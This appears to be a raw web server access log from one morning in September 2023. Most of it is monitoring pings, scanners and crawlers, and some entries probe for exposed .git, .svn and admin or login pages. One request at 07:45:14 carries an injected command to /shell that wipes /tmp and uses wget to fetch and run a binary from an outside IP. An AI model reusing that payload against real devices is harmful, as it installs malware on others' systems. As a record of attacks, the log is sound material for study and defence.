64.62.197.239 - - [04/Sep/2023:07:17:10 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
193.106.29.122 - - [04/Sep/2023:07:17:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
18.133.246.111 - - [04/Sep/2023:07:17:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:07:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.203.211.93 - - [04/Sep/2023:07:19:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Sep/2023:07:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.133.246.111 - - [04/Sep/2023:07:22:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:07:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.133.246.111 - - [04/Sep/2023:07:25:11 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:07:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.133.246.111 - - [04/Sep/2023:07:26:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:07:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.128.19.58 - - [04/Sep/2023:07:27:11 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:07:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.133.246.111 - - [04/Sep/2023:07:29:10 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:07:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.133.246.111 - - [04/Sep/2023:07:32:08 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:07:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.133.246.111 - - [04/Sep/2023:07:34:34 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:07:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.133.246.111 - - [04/Sep/2023:07:37:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:07:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [04/Sep/2023:07:38:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [04/Sep/2023:07:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.133.246.111 - - [04/Sep/2023:07:40:06 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:07:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.99.123.19 - - [04/Sep/2023:07:43:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
3.10.198.239 - - [04/Sep/2023:07:43:44 +0200] "" 501 315 "-" "-"
18.133.246.111 - - [04/Sep/2023:07:43:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:07:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.198.239 - - [04/Sep/2023:07:44:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:07:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.55.225.29 - - [04/Sep/2023:07:45:14 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget http://185.254.37.243/skid.arm; chmod 777 skid.arm; ./skid.arm Jaws; rm -rf * HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:07:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.133.246.111 - - [04/Sep/2023:07:46:12 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:07:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.75.96.241 - - [04/Sep/2023:07:48:25 +0200] "GET /robots.txt HTTP/1.0" 404 327 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)"
34.75.96.241 - - [04/Sep/2023:07:48:25 +0200] "GET / HTTP/1.0" 200 1229 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)"
212.91.246.72 - - [04/Sep/2023:07:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.133.246.111 - - [04/Sep/2023:07:49:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
194.165.16.10 - - [04/Sep/2023:07:49:31 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [04/Sep/2023:07:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.198.239 - - [04/Sep/2023:07:50:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:07:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.133.246.111 - - [04/Sep/2023:07:51:54 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
179.43.191.162 - - [04/Sep/2023:07:52:10 +0200] "GET /.hg HTTP/1.1" 404 308 "-" "python-requests/2.31.0"
179.43.191.162 - - [04/Sep/2023:07:52:10 +0200] "GET /.svn HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
139.99.9.160 - - [04/Sep/2023:07:52:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
212.91.246.72 - - [04/Sep/2023:07:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.198.239 - - [04/Sep/2023:07:53:16 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
178.128.19.58 - - [04/Sep/2023:07:53:24 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:07:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [04/Sep/2023:07:54:02 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
18.133.246.111 - - [04/Sep/2023:07:54:22 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:07:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.211.122 - - [04/Sep/2023:07:56:22 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Sep/2023:07:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.133.246.111 - - [04/Sep/2023:07:56:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.10.198.239 - - [04/Sep/2023:07:56:58 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:07:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:07:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.198.239 - - [04/Sep/2023:08:00:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.211.122 - - [04/Sep/2023:08:01:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.198.239 - - [04/Sep/2023:08:02:08 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
205.210.31.172 - - [04/Sep/2023:08:02:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.198.239 - - [04/Sep/2023:08:04:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.211.122 - - [04/Sep/2023:08:05:08 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.211.122 - - [04/Sep/2023:08:06:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.198.239 - - [04/Sep/2023:08:07:31 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
162.216.149.123 - - [04/Sep/2023:08:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Sep/2023:08:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.211.122 - - [04/Sep/2023:08:09:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
193.106.29.122 - - [04/Sep/2023:08:09:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [04/Sep/2023:08:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.211.122 - - [04/Sep/2023:08:10:38 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.10.198.239 - - [04/Sep/2023:08:10:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [04/Sep/2023:08:12:00 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [04/Sep/2023:08:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.198.239 - - [04/Sep/2023:08:13:20 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.211.122 - - [04/Sep/2023:08:14:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.198.239 - - [04/Sep/2023:08:15:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.178.211.122 - - [04/Sep/2023:08:15:59 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.77.127.183 - - [04/Sep/2023:08:17:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
212.91.246.72 - - [04/Sep/2023:08:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.198.239 - - [04/Sep/2023:08:18:40 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.211.122 - - [04/Sep/2023:08:19:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.198.239 - - [04/Sep/2023:08:21:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.178.211.122 - - [04/Sep/2023:08:21:24 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.198.239 - - [04/Sep/2023:08:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.211.122 - - [04/Sep/2023:08:25:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.211.122 - - [04/Sep/2023:08:27:47 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.140.130.61 - - [04/Sep/2023:08:28:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
34.140.130.61 - - [04/Sep/2023:08:28:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
212.91.246.72 - - [04/Sep/2023:08:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.211.122 - - [04/Sep/2023:08:32:01 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.211.122 - - [04/Sep/2023:08:33:42 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.199.177 - - [04/Sep/2023:08:36:16 +0200] "" 501 315 "-" "-"
185.12.221.159 - - [04/Sep/2023:08:36:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:08:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
189.126.64.111 - - [04/Sep/2023:08:36:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
35.178.199.177 - - [04/Sep/2023:08:37:08 +0200] "" 501 315 "-" "-"
35.178.211.122 - - [04/Sep/2023:08:37:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.178.211.122 - - [04/Sep/2023:08:39:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.217.220 - - [04/Sep/2023:08:41:08 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.217.220 - - [04/Sep/2023:08:43:04 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
170.254.74.160 - - [04/Sep/2023:08:44:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
18.170.217.220 - - [04/Sep/2023:08:44:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.217.220 - - [04/Sep/2023:08:45:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:08:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.43.33.218 - - [04/Sep/2023:08:47:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
212.91.246.72 - - [04/Sep/2023:08:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.217.220 - - [04/Sep/2023:08:47:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.170.217.220 - - [04/Sep/2023:08:48:16 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:08:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.217.220 - - [04/Sep/2023:08:49:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.170.217.220 - - [04/Sep/2023:08:50:14 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:08:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
